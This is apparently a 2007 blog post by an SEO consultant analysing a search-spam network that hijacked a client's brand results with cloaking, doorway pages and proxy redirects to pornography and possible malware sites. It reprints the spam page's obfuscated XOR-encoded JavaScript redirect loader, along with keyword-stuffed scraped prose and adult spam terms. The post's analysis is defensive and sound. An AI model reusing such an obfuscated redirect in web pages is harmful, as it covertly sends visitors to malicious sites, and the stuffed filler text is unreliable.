Monday, February 12, 2007

Google Spam Technique Uncovered

It all began with a client calling and telling me that they uncovered a heinous result in Google. The offender, seeking to gain on their branded term to display pornography and perhaps even install spy ware and viruses, was sitting at position 3 for my client’s brand. We all as SEO’s know the standard procedure is to jump up, bump one’s head into the wall and scream emphatically over the sound of New York City police sirens. But seriously, to submit a Google spam report can take weeks, weeks of defamation and slander for no good reason that leaves one feeling helpless.

Well, I decided to proceed with the standard approach and also to dig up everything and anything I could about the culprit – especially with my curiosity piqued over how this black hat person got a leg up on Google’s algorithm. Thus began my challenge to discover the technique (websites and names have been changed to protect the innocent and guilty).

First, I took a look at the offending website listing on Google, where it was listed as, clicked on it and let it take me to the pornography result. It ended up taking me from to I decided that there were way too many unquestionably bad things to see in front of my face all at once like that, so I took a step back. Pressing the escape key on my computer keyboard prior to the redirect into porn, I landed in a seemingly blank page.

To my surprise however, there was nothing on this page but an H1 tag, JavaScript declarations and some ellipse marks. JavaScript? That certainly seemed out of scope on a basic page like this. I took a look at the JavaScript, and to my surprise the code was in fact, encoded. At the time it seemed to me to have been encrypted. So I decided to look up the function and low and behold, the key to the redirect was held in the encoded JavaScript.

So, what is the easiest way to analyze and determine what the code was doing? Take the code, save it to the desktop (X if you are a Linux geek), and change the JavaScript to not execute but rather write the result to the window. Now once that is complete, I ran the code once more with no executed code and on the screen I see the redirect to yet another website URL:


Sneaky bastards used a complex JavaScript to embed an encoded JavaScript into the page and also applied a gateway/cloaking page strategy to ensure the key terms used were spammed to hell – giving them some possibility of high rank for some time…

But alas, there was more, much more. The site was using a proxy website spamming technique. Example: (with redirect from -> So in essence, the spammer could have thousands of websites using the redirect script, a proxy from and even if one was banned, delisted or penalized, there were thousands of other foot soldiers to take its place. Another very interesting fact was that these “foot soldier” websites held hundreds to thousands of spam pages as well, giving them that much more potential to rank for seemingly random keywords and terms. On with the challenge…

I decided to remove the spam page URL and try the root URL were there were large blocks of links (up to thousands) with nothing but spaces in between them. Looking at the different terms used, they must have been generated either using an bot to determine best search frequency terms or from a sampling of RSS feeds/website directories. Given this scenario, there were so many random links and phrases/terms that it seemed like it was sampling from a text file or some directory listings.

Now knowing that the spammer had a brilliant strategy in mind to conquer results to gain traffic to the pornography website (install malware, etc), there were a couple of things left on my mind: how widespread was this strategy (how many websites), where are these sites, does Google have an index of them? Do they forward to any other “questionable” or “profitable” sites?

Using a reverse DNS tool on the first set of Domains, I pulled up about 90 domains belonging to about 15 IP addresses. Knowing that this is probably a small segment of their “network”, it was still quite sizeable and doing some basic math, it looked like they could have positioned themselves to gain upwards to 1.2 million terms.

Even considering that many of the terms would land on page 2 instead of top spots, the spammer could essentially still benefit from a quantity driving strategy, making money on malware installations, traffic brought to the website or even through having a combo of revenue methods strung together. If only 100 people were looking on average for each of the 1.2 million terms, that would mean that 120,000,000 searches could be a potential but realistically 12,000,000 could end up being driven into the spamtastic That figure is no joke, and it could be quite small when considering the breadth of terms, amount of domains, pages indexed and searches performed.

Phew! What a mouthful there. So now for a look at the actual code from this dubious result for all you SEO geeks out there:

[!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[title] [/title]
[meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"]
[meta name="keywords" content=""]
[meta name="description" content=" Online Looking for ? Welcome to Site. Full Information About Here"]
function nMfqvYV()
eval ("var decs = new Array ();var coder = 62;var r = '';");decs [decs.length] = '%5a%51';decs [decs.length] = '%5d%4b%53';decs [decs.length] = '%5b%50%4a';decs [decs.length] = '%10';decs [decs.length] = '%52%51%5d';decs [decs.length] = '%5f%4a%57';decs [decs.length] = '%51%50';decs [decs.length] = '%3%1c%56';decs [decs.length] = '%4a%4a';decs [decs.length] = '%4e%4';decs [decs.length] = '%11%11%5d';decs [decs.length] = '%59';decs [decs.length] = '%9%7';decs [decs.length] = '%49%51%c';decs [decs.length] = '%e';decs [decs.length] = '%55%52%7';decs [decs.length] = '%c';decs [decs.length] = '%5a%51';decs [decs.length] = '%51%49';decs [decs.length] = '%58';decs [decs.length] = '%50';decs [decs.length] = '%e%f%51';decs [decs.length] = '%4f%4e';decs [decs.length] = '%51%7';decs [decs.length] = '%53%5a';decs [decs.length] = '%57%5b';decs [decs.length] = '%51';decs [decs.length] = '%49';decs [decs.length] = '%48%b%4a';decs [decs.length] = '%47%54';decs [decs.length] = '%10';decs [decs.length] = '%5d';decs [decs.length] = '%51%53';decs [decs.length] = '%11';decs [decs.length] = '%58';decs [decs.length] = '%57';decs [decs.length] = '%50%c%11';decs [decs.length] = '%4d%5b%5f';decs [decs.length] = '%4c%5d%56';decs [decs.length] = '%10%4e%56';decs [decs.length] = '%4e';decs [decs.length] = '%1';decs [decs.length] = '%4f';decs [decs.length] = '%4f%3%6d';decs [decs.length] = '%4a%5f%4c';decs [decs.length] = '%4a%4c%57';decs [decs.length] = '%5c%4b%50';decs [decs.length] = '%5b';decs [decs.length] = '%10';decs [decs.length] = '%5d%51%53';decs [decs.length] = '%1c%5';
for (ii=0;ii[decs.length;ii++)
var arr = decs[ii].split ( '%' );
for (j=1;j[arr.length;j++)
arr[j] = (('0x' + arr[j]) ^ coder).toString(16);
r += arr.join ( '%' );
eval(unescape (r));
[table align="center" class="main" cellpadding=0 cellspacing=0 width=760]
[tr valign="top"]
[p] had i been there together with my soul? i ran up the stairs in great haste, i don t remember - but suddenly she broke into sobs and trembled all over. a terrible fit of hysterics followed. i had frightened her. i carried her to the bed. when the attack had passed off, sitting on the bed, looked at me and at the revolver note that the revolver was already an object familiar to her. i had kept one loaded ever since i opened the shop. i made up my mind. that evening the shopkeeper came, bringing with him a pound of sweets from the shop; she was sitting at her little table. she was busy at her needlework, and sometimes in the evening she read books taken from my bookcase. the choice of books in the bookcase must have had an influence in my favour too. she hardly ever went out. just before dusk, after dinner, i used to take her out every day for a walk. we took a constitutional, but we were not absolutely silent, as we used to be. i tried, in fact, to make a show of decorum and eager for trouble. she went out of her way to stir up trouble. her gentleness hindered her, though. when a girl like that rebels, however outrageously she may behave, one can always see that she is forcing herself to do it, and that it is impossible for her to master and overcome her own modesty and shamefacedness. that is why such people go such lengths at times, so that one can hardly believe one s eyes. one who is accustomed to depravity, on the contrary, it sometimes attracts the feminine heart. in fact, i purposely deferred the climax: what had happened was meanwhile, enough for my peace of mind and provided a great number of pictures and materials for my dreams. that is what is wrong, that i am not sleepy: in great, too great sorrow, after the first outbursts one is always sleepy. men condemned to death, they say, sleep very soundly on the last night. and so it went on for some time. but my anger could never be very real or violent. and i felt myself as though it were only acting. and though i had broken off out marriage by buying that bedstead and screen, i could never, never look upon her as a criminal. and not that i took a frivolous view of her crime, but because i would not have them to see me, and i would not keep a huge dog or a strong manservant, as mozer does, for instance. my cook opens the doors to my visitors. but in our trade it is impossible to be without means of self-defence in case of emergency, and i kept a loaded revolver. in early days, when first she was living in my house, she took great interest in that revolver, and asked questions about it, and i even explained its construction and working; i even persuaded her once to fire at a target. then her voice was rather strong, resonant; though not quit true it was very sweet and healthy. now her little song was so faint - it was not a coward, and that i had seen nothing, especially as it was utterly improbable that, after seeing what i had seen, i should shut my eyes again, and at the same instant. oh, what a whirl of thoughts and sensations rushed into my mind in less than a minute. hurrah for the electric speed of thought! in that case so i felt, if she guessed the truth and knew that i was not a personal affair, but that it concerned the regiment, and about a month ago, being a shameless fellow, he once or twice came into the shop with a pretence of pawning something, and i remember, began laughing with shame you know how it is when people laugh with shame. she became hysterical, i saw that she was too, and it was only caused by the desperateness of my position. but that is over.... oh, now you are a personage - a financier! a hint at the pawnbroker s shop. but by then i had succeeded in recovering my mastery of myself. i saw that she was thirsting for explanations that be humiliating to me and - i did not leave her side. i kept telling her i should take her to boulogne to bathe in the sea now, at once, in a fortnight, that she had not been with them. teen titans oekaki gunilla hutton horacio altuna andys muscle one winged angel remix hugeboobpics teentitans hentai inutaisho human chimera fused twins luxurious villa ilios anakee tiffany amber theisen intellext information company search user watson hayden panettiere nude tempest bledsoe he mele no lilo hothat tawnee stone shrine copyright © 2002-2006, all rights reserved. [/p]
[/html] was used 71 times in the gibberish text above.

Now, I can’t say that this wasn’t a fun project, but nonetheless, this kind of crap does impede the good name and nature of SEO folks who walk in the white/grey hat line. We all want relevant searches and expect that all of our efforts will certainly help deliver those results. Even though different clients come across our plate, the end result is the same, clients get educated, we learn more about technology, industries and online marketing strategy, and search engines evolve.

Helping to close the gap for these silly tactics to gain ground in, is every SEO’s responsibility. One network of spammers killed off, wastes their money, removes tens of thousands of possibly affected results from coming to fruition and makes search engines/companies happier – leaving us to look as we should, great professionals with a conscious who are united.

Feel free to leave your impression about this topic. Bad or good, Search Engine Optimization comments always lead to evolving technologies, algorithms and techniques.